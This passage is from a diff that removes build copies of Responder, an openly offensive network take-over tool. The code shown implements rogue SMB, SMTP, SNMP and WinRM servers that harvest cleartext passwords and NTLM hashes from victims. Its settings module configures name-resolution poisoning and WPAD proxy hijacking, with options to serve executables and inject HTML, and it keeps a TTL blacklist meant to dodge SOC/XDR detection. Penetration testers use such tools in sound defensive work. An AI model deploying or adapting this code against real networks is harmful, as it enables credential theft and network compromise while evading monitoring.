Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[8:10] == b"\x75\x00" and data[4:5] == b"\xff": # Tree Connect AndX Request
ParseShare(data)
Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(NetworkRecvBufferPython2or3(data)), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(NetworkRecvBufferPython2or3(data)))
Body = SMBTreeData()
Body.calculate()
packet1 = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
except:
pass
class SMB1LM(BaseRequestHandler): # SMB Server class, old version
def handle(self):
try:
self.request.settimeout(1)
data = self.request.recv(1024)
Challenge = RandomChallenge()
if data[0:1] == b"\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[8:10] == b"\x72\x00": #Negotiate proto answer.
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)),Domain="",Key=NetworkRecvBufferPython2or3(Challenge))
Body.calculate()
Packet = str(head)+str(Body)
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[8:10] == b"\x73\x00": #Session Setup AndX Request
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Packet = str(head)+str(SMBSessEmpty())
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
self.request.send(NetworkSendBufferPython2or3(Buffer))
else:
ParseLMNTHash(data,self.client_address[0], Challenge)
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Packet = str(head) + str(SMBSessEmpty())
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
except Exception:
self.request.close()
pass

81
build/lib/Responder/servers/SMTP.py
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@ -1,81 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import *
from base64 import b64decode
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from Responder.packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
class ESMTP(BaseRequestHandler):
def handle(self):
try:
self.request.send(NetworkSendBufferPython2or3(SMTPGreeting()))
data = self.request.recv(1024)
if data[0:4] == b'EHLO' or data[0:4] == b'ehlo':
self.request.send(NetworkSendBufferPython2or3(SMTPAUTH()))
data = self.request.recv(1024)
if data[0:4] == b'AUTH':
AuthPlain = re.findall(b'(?<=AUTH PLAIN )[^\r]*', data)
if AuthPlain:
User = list(filter(None, b64decode(AuthPlain[0]).split(b'\x00')))
Username = User[0].decode('latin-1')
Password = User[1].decode('latin-1')
SaveToDb({
'module': 'SMTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Username,
'cleartext': Password,
'fullhash': Username+":"+Password,
})
else:
self.request.send(NetworkSendBufferPython2or3(SMTPAUTH1()))
data = self.request.recv(1024)
if data:
try:
User = list(filter(None, b64decode(data).split(b'\x00')))
Username = User[0].decode('latin-1')
Password = User[1].decode('latin-1')
except:
Username = b64decode(data).decode('latin-1')
self.request.send(NetworkSendBufferPython2or3(SMTPAUTH2()))
data = self.request.recv(1024)
if data:
try: Password = b64decode(data).decode('latin-1')
except: Password = data
SaveToDb({
'module': 'SMTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Username,
'cleartext': Password,
'fullhash': Username+":"+Password,
})
except Exception:
pass

62
build/lib/Responder/servers/SNMP.py
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@ -1,62 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import *
from binascii import hexlify
from pyasn1.codec.ber.decoder import decode
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
class SNMP(BaseRequestHandler):
def handle(self):
data = self.request[0]
received_record, rest_of_substrate = decode(data)
snmp_version = int(received_record['field-0'])
if snmp_version == 3:
full_snmp_msg = hexlify(data).decode('utf-8')
received_record_inner, _ = decode(received_record['field-2'])
snmp_user = str(received_record_inner['field-3'])
engine_id = hexlify(received_record_inner['field-0']._value).decode('utf-8')
auth_params = hexlify(received_record_inner['field-4']._value).decode('utf-8')
SaveToDb({
"module": "SNMP",
"type": "SNMPv3",
"client" : self.client_address[0],
"user": snmp_user,
"hash": auth_params,
"fullhash": "{}:{}:{}:{}".format(snmp_user, full_snmp_msg, engine_id, auth_params)
})
else:
community_string = str(received_record['field-1'])
snmp_version = '1' if snmp_version == 0 else '2c'
SaveToDb(
{
"module": "SNMP",
"type": "Cleartext SNMPv{}".format(snmp_version),
"client": self.client_address[0],
"user": community_string,
"cleartext": community_string,
"fullhash": community_string,
}
)

184
build/lib/Responder/servers/WinRM.py
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@ -1,184 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import codecs
from Responder.utils import *
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler, StreamRequestHandler
else:
from SocketServer import BaseRequestHandler, StreamRequestHandler
from base64 import b64decode, b64encode
from Responder.packets import NTLM_Challenge
from Responder.packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer, WinRM_NTLM_Challenge_Ans
from Responder.packets import WPADScript, ServeExeFile, ServeHtmlFile
# Parse NTLMv1/v2 hash.
def ParseHTTPHash(data, Challenge, client, module):
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen]
LMHashFinal = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen]
NTHashFinal = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].decode('latin-1').replace('\x00','')
Challenge1 = codecs.encode(Challenge,'hex').decode('latin-1')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHashFinal, NTHashFinal, Challenge1)
SaveToDb({
'module': module,
'type': 'NTLMv1',
'client': client,
'host': HostName,
'user': User,
'hash': LMHashFinal+':'+NTHashFinal,
'fullhash': WriteHash,
})
if NthashLen > 24:
NthashLen = 64
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].decode('latin-1').replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, Challenge1, NTHashFinal[:32], NTHashFinal[32:])
SaveToDb({
'module': module,
'type': 'NTLMv2',
'client': client,
'host': HostName,
'user': Domain + '\\' + User,
'hash': NTHashFinal[:32] + ':' + NTHashFinal[32:],
'fullhash': WriteHash,
})
# Handle HTTP packet sequence.
def PacketSequence(data, client, Challenge):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
if NTLM_Auth or NTLM_Auth2:
if NTLM_Auth2:
Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
if NTLM_Auth:
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == b'\x01':
Buffer = NTLM_Challenge(NegoFlags="\x35\x82\x89\xe2", ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
Buffer.calculate()
if NTLM_Auth2:
Buffer_Ans = WinRM_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
return Buffer_Ans
else:
Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
return Buffer_Ans
if Packet_NTLM == b'\x03':
if NTLM_Auth2:
NTLM_Auth = b64decode(''.join(NTLM_Auth2))
else:
NTLM_Auth = b64decode(''.join(NTLM_Auth))
ParseHTTPHash(NTLM_Auth, Challenge, client, "WinRM")
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return Buffer
elif Basic_Auth:
ClearText_Auth = b64decode(''.join(Basic_Auth))
SaveToDb({
'module': 'WinRM',
'type': 'Basic',
'client': client,
'user': ClearText_Auth.decode('latin-1').split(':')[0],
'cleartext': ClearText_Auth.decode('latin-1').split(':')[1],
})
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return Buffer
else:
if settings.Config.Basic:
r = IIS_Basic_401_Ans()
r.calculate()
Response = r
if settings.Config.Verbose:
print(text("[WinRM] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
else:
r = IIS_Auth_401_Ans()
r.calculate()
Response = r
if settings.Config.Verbose:
print(text("[WinRM] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
return Response
# HTTP Server class
class WinRM(BaseRequestHandler):
def handle(self):
try:
Challenge = RandomChallenge()
while True:
self.request.settimeout(3)
remaining = 10*1024*1024 #setting max recieve size
data = ''
while True:
buff = ''
buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
if buff == '':
break
data += buff
remaining -= len(buff)
#check if we recieved the full header
if data.find('\r\n\r\n') != -1:
#we did, now to check if there was anything else in the request besides the header
if data.find('Content-Length') == -1:
#request contains only header
break
else:
#searching for that content-length field in the header
for line in data.split('\r\n'):
if line.find('Content-Length') != -1:
line = line.strip()
remaining = int(line.split(':')[1].strip()) - len(data)
if remaining <= 0:
break
if data == "":
break
else:
Buffer = PacketSequence(data,self.client_address[0], Challenge)
self.request.send(NetworkSendBufferPython2or3(Buffer))
except:
self.request.close()
pass

0
build/lib/Responder/servers/__init__.py
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387
build/lib/Responder/settings.py
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@ -1,387 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, random
import Responder.utils as utils
if (sys.version_info > (3, 0)):
import configparser as ConfigParser
else:
import ConfigParser
import subprocess
from Responder.utils import *
__version__ = 'Responder 3.1.4.0'
class Settings:
def __init__(self):
self.ResponderPATH = os.path.dirname(__file__)
self.Bind_To = '0.0.0.0'
def __str__(self):
ret = 'Settings class:\n'
for attr in dir(self):
value = str(getattr(self, attr)).strip()
ret += " Settings.%s = %s\n" % (attr, value)
return ret
def toBool(self, str):
return str.upper() == 'ON'
def ExpandIPRanges(self):
def expand_ranges(lst):
ret = []
for l in lst:
if ':' in l: #For IPv6 addresses, similar to the IPv4 version below but hex and pads :'s to expand shortend addresses
while l.count(':') < 7:
pos = l.find('::')
l = l[:pos] + ':' + l[pos:]
tab = l.split(':')
x = {}
i = 0
xaddr = ''
for byte in tab:
if byte == '':
byte = '0'
if '-' not in byte:
x[i] = x[i+1] = int(byte, base=16)
else:
b = byte.split('-')
x[i] = int(b[0], base=16)
x[i+1] = int(b[1], base=16)
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
for e in range(x[8], x[9]+1):
for f in range(x[10], x[11]+1):
for g in range(x[12], x[13]+1):
for h in range(x[14], x[15]+1):
xaddr = ('%x:%x:%x:%x:%x:%x:%x:%x' % (a, b, c, d, e, f, g, h))
xaddr = re.sub('(^|:)0{1,4}', ':', xaddr, count = 7)#Compresses expanded IPv6 address
xaddr = re.sub(':{3,7}', '::', xaddr, count = 7)
ret.append(xaddr)
else:
tab = l.split('.')
x = {}
i = 0
for byte in tab:
if '-' not in byte:
x[i] = x[i+1] = int(byte)
else:
b = byte.split('-')
x[i] = int(b[0])
x[i+1] = int(b[1])
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
ret.append('%d.%d.%d.%d' % (a, b, c, d))
return ret
self.RespondTo = expand_ranges(self.RespondTo)
self.DontRespondTo = expand_ranges(self.DontRespondTo)
def populate(self, options):
if options.Interface == None and utils.IsOsX() == False:
print(utils.color("Error: -I <if> mandatory option is missing", 1))
sys.exit(-1)
if options.Interface == "ALL" and options.OURIP == None:
print(utils.color("Error: -i is missing.\nWhen using -I ALL you need to provide your current ip address", 1))
sys.exit(-1)
#Python version
if (sys.version_info > (3, 0)):
self.PY2OR3 = "PY3"
else:
self.PY2OR3 = "PY2"
# Config parsing
config = ConfigParser.ConfigParser()
config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
# Poisoners
self.LLMNR_On_Off = self.toBool(config.get('Responder Core', 'LLMNR'))
self.NBTNS_On_Off = self.toBool(config.get('Responder Core', 'NBTNS'))
self.MDNS_On_Off = self.toBool(config.get('Responder Core', 'MDNS'))
# Servers
self.HTTP_On_Off = self.toBool(config.get('Responder Core', 'HTTP'))
self.SSL_On_Off = self.toBool(config.get('Responder Core', 'HTTPS'))
self.SMB_On_Off = self.toBool(config.get('Responder Core', 'SMB'))
self.SQL_On_Off = self.toBool(config.get('Responder Core', 'SQL'))
self.FTP_On_Off = self.toBool(config.get('Responder Core', 'FTP'))
self.POP_On_Off = self.toBool(config.get('Responder Core', 'POP'))
self.IMAP_On_Off = self.toBool(config.get('Responder Core', 'IMAP'))
self.SMTP_On_Off = self.toBool(config.get('Responder Core', 'SMTP'))
self.LDAP_On_Off = self.toBool(config.get('Responder Core', 'LDAP'))
self.MQTT_On_Off = self.toBool(config.get('Responder Core', 'MQTT'))
self.DNS_On_Off = self.toBool(config.get('Responder Core', 'DNS'))
self.RDP_On_Off = self.toBool(config.get('Responder Core', 'RDP'))
self.DCERPC_On_Off = self.toBool(config.get('Responder Core', 'DCERPC'))
self.WinRM_On_Off = self.toBool(config.get('Responder Core', 'WINRM'))
self.Krb_On_Off = self.toBool(config.get('Responder Core', 'Kerberos'))
self.SNMP_On_Off = self.toBool(config.get('Responder Core', 'SNMP'))
# Db File
self.DatabaseFile = os.path.join(self.ResponderPATH, config.get('Responder Core', 'Database'))
# Log Files
self.LogDir = os.path.join(self.ResponderPATH, 'logs')
if not os.path.exists(self.LogDir):
os.mkdir(self.LogDir)
self.SessionLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'SessionLog'))
self.PoisonersLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'PoisonersLog'))
self.AnalyzeLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'AnalyzeLog'))
self.ResponderConfigDump = os.path.join(self.LogDir, config.get('Responder Core', 'ResponderConfigDump'))
# CLI options
self.ExternalIP = options.ExternalIP
self.LM_On_Off = options.LM_On_Off
self.NOESS_On_Off = options.NOESS_On_Off
self.WPAD_On_Off = options.WPAD_On_Off
self.DHCP_On_Off = options.DHCP_On_Off
self.Basic = options.Basic
self.Interface = options.Interface
self.OURIP = options.OURIP
self.Force_WPAD_Auth = options.Force_WPAD_Auth
self.Upstream_Proxy = options.Upstream_Proxy
self.AnalyzeMode = options.Analyze
self.Verbose = options.Verbose
self.ProxyAuth_On_Off = options.ProxyAuth_On_Off
self.CommandLine = str(sys.argv)
self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
self.Bind_To6 = utils.FindLocalIP6(self.Interface, self.OURIP)
self.DHCP_DNS = options.DHCP_DNS
self.ExternalIP6 = options.ExternalIP6
self.Quiet_Mode = options.Quiet
# TTL blacklist. Known to be detected by SOC / XDR
TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"]
# Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py)
if options.TTL is None:
self.TTL = None
# Random TTL
elif options.TTL.upper() == "RANDOM":
TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x'))
if TTL in TTL_blacklist:
TTL = int.from_bytes(TTL, "big")+1
TTL = int.to_bytes(TTL, 4)
self.TTL = TTL.decode('utf-8')
else:
self.TTL = bytes.fromhex("000000"+options.TTL).decode('utf-8')
#Do we have IPv6 for real?
self.IPv6 = utils.Probe_IPv6_socket()
if self.Interface == "ALL":
self.Bind_To_ALL = True
else:
self.Bind_To_ALL = False
#IPV4
if self.Interface == "ALL":
self.IP_aton = socket.inet_aton(self.OURIP)
else:
self.IP_aton = socket.inet_aton(self.Bind_To)
#IPV6
if self.Interface == "ALL":
if self.OURIP != None and utils.IsIPv6IP(self.OURIP):
self.IP_Pton6 = socket.inet_pton(socket.AF_INET6, self.OURIP)
else:
self.IP_Pton6 = socket.inet_pton(socket.AF_INET6, self.Bind_To6)
#External IP
if self.ExternalIP:
if utils.IsIPv6IP(self.ExternalIP):
sys.exit(utils.color('[!] IPv6 address provided with -e parameter. Use -6 IPv6_address instead.', 1))
self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
self.ExternalResponderIP = utils.RespondWithIP()
else:
self.ExternalResponderIP = self.Bind_To
#External IPv6
if self.ExternalIP6:
self.ExternalIP6Pton = socket.inet_pton(socket.AF_INET6, self.ExternalIP6)
self.ExternalResponderIP6 = utils.RespondWithIP6()
else:
self.ExternalResponderIP6 = self.Bind_To6
self.Os_version = sys.platform
self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
self.IMAPLog = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt')
self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
self.MQTTLog = os.path.join(self.LogDir, 'MQTT-Clear-Text-Password-%s.txt')
self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
self.SNMPLog = os.path.join(self.LogDir, 'SNMP-Clear-Text-Password-%s.txt')
self.LDAPNTLMv1Log = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv1Log = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv2Log = os.path.join(self.LogDir, 'HTTP-NTLMv2-Client-%s.txt')
self.KerberosLog = os.path.join(self.LogDir, 'MSKerberos-Client-%s.txt')
self.MSSQLNTLMv1Log = os.path.join(self.LogDir, 'MSSQL-NTLMv1-Client-%s.txt')
self.MSSQLNTLMv2Log = os.path.join(self.LogDir, 'MSSQL-NTLMv2-Client-%s.txt')
self.SMBNTLMv1Log = os.path.join(self.LogDir, 'SMB-NTLMv1-Client-%s.txt')
self.SMBNTLMv2Log = os.path.join(self.LogDir, 'SMB-NTLMv2-Client-%s.txt')
self.SMBNTLMSSPv1Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv1-Client-%s.txt')
self.SMBNTLMSSPv2Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv2-Client-%s.txt')
# HTTP Options
self.Serve_Exe = self.toBool(config.get('HTTP Server', 'Serve-Exe'))
self.Serve_Always = self.toBool(config.get('HTTP Server', 'Serve-Always'))
self.Serve_Html = self.toBool(config.get('HTTP Server', 'Serve-Html'))
self.Html_Filename = config.get('HTTP Server', 'HtmlFilename')
self.Exe_Filename = config.get('HTTP Server', 'ExeFilename')
self.Exe_DlName = config.get('HTTP Server', 'ExeDownloadName')
self.WPAD_Script = config.get('HTTP Server', 'WPADScript')
self.HtmlToInject = config.get('HTTP Server', 'HtmlToInject')
if len(self.HtmlToInject) == 0:
self.HtmlToInject = ""# Let users set it up themself in Responder.conf. "<img src='file://///"+self.Bind_To+"/pictures/logo.jpg' alt='Loading' height='1' width='1'>"
if len(self.WPAD_Script) == 0:
if self.WPAD_On_Off:
self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}'
if self.ProxyAuth_On_Off:
self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}'
if self.Serve_Exe == True:
if not os.path.exists(self.Html_Filename):
print(utils.color("/!\\ Warning: %s: file not found" % self.Html_Filename, 3, 1))
if not os.path.exists(self.Exe_Filename):
print(utils.color("/!\\ Warning: %s: file not found" % self.Exe_Filename, 3, 1))
# SSL Options
self.SSLKey = config.get('HTTPS Server', 'SSLKey')
self.SSLCert = config.get('HTTPS Server', 'SSLCert')
# Respond to hosts
self.RespondTo = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')]))
self.RespondToName = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')]))
self.DontRespondTo = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')]))
self.DontRespondToName_= list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]))
#add a .local to all provided DontRespondToName
self.MDNSTLD = ['.LOCAL']
self.DontRespondToName = [x+y for x in self.DontRespondToName_ for y in ['']+self.MDNSTLD]
#Generate Random stuff for one Responder session
self.MachineName = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)])
self.Username = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])
self.Domain = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(4)])
self.DHCPHostname = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)])
self.DomainName = self.Domain + '.LOCAL'
self.MachineNego = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) +'$@'+self.DomainName
self.RPCPort = random.randrange(45000, 49999)
# Auto Ignore List
self.AutoIgnore = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
self.CaptureMultipleHashFromSameHost = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost'))
self.AutoIgnoreList = []
# Set up Challenge
self.NumChal = config.get('Responder Core', 'Challenge')
if self.NumChal.lower() == 'random':
self.NumChal = "random"
if len(self.NumChal) != 16 and self.NumChal != "random":
print(utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1))
sys.exit(-1)
self.Challenge = b''
if self.NumChal.lower() == 'random':
pass
else:
if self.PY2OR3 == 'PY2':
for i in range(0, len(self.NumChal),2):
self.Challenge += self.NumChal[i:i+2].decode("hex")
else:
self.Challenge = bytes.fromhex(self.NumChal)
# Set up logging
logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logging.warning('Responder Started: %s' % self.CommandLine)
Formatter = logging.Formatter('%(asctime)s - %(message)s')
PLog_Handler = logging.FileHandler(self.PoisonersLogFile, 'w')
ALog_Handler = logging.FileHandler(self.AnalyzeLogFile, 'a')
PLog_Handler.setLevel(logging.INFO)
ALog_Handler.setLevel(logging.INFO)
PLog_Handler.setFormatter(Formatter)
ALog_Handler.setFormatter(Formatter)
self.PoisonersLogger = logging.getLogger('Poisoners Log')
self.PoisonersLogger.addHandler(PLog_Handler)
self.AnalyzeLogger = logging.getLogger('Analyze Log')
self.AnalyzeLogger.addHandler(ALog_Handler)
# First time Responder run?
if os.path.isfile(self.ResponderPATH+'/Responder.db'):
pass
else:
#If it's the first time, generate SSL certs for this Responder session and send openssl output to /dev/null
# Certs = os.system(self.ResponderPATH+"/certs/gen-self-signed-cert.sh >/dev/null 2>&1")
print(self.ResponderPATH + '/certs')
Certs = os.system(f"{self.ResponderPATH}/certs/gen-self-signed-cert.sh {self.ResponderPATH} >/dev/null 2>&1")
try:
NetworkCard = subprocess.check_output(["ifconfig", "-a"])
except:
try:
NetworkCard = subprocess.check_output(["ip", "address", "show"])
except subprocess.CalledProcessError as ex:
NetworkCard = "Error fetching Network Interfaces:", ex
pass
try:
p = subprocess.Popen('resolvectl', stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
DNS = p.stdout.read()
except:
p = subprocess.Popen(['cat', '/etc/resolv.conf'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
DNS = p.stdout.read()
try:
RoutingInfo = subprocess.check_output(["netstat", "-rn"])
except:
try:
RoutingInfo = subprocess.check_output(["ip", "route", "show"])
except subprocess.CalledProcessError as ex:
RoutingInfo = "Error fetching Routing information:", ex
pass
Message = "%s\nCurrent environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(utils.HTTPCurrentDate(), NetworkCard.decode('latin-1'),DNS.decode('latin-1'),RoutingInfo.decode('latin-1'))
try:
utils.DumpConfig(self.ResponderConfigDump, Message)
#utils.DumpConfig(self.ResponderConfigDump,str(self))
except AttributeError as ex:
print("Missing Module:", ex)
pass
def init():
global Config
Config = Settings()

118
build/lib/Responder/tools/BrowserListener.py
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@ -1,118 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import _thread
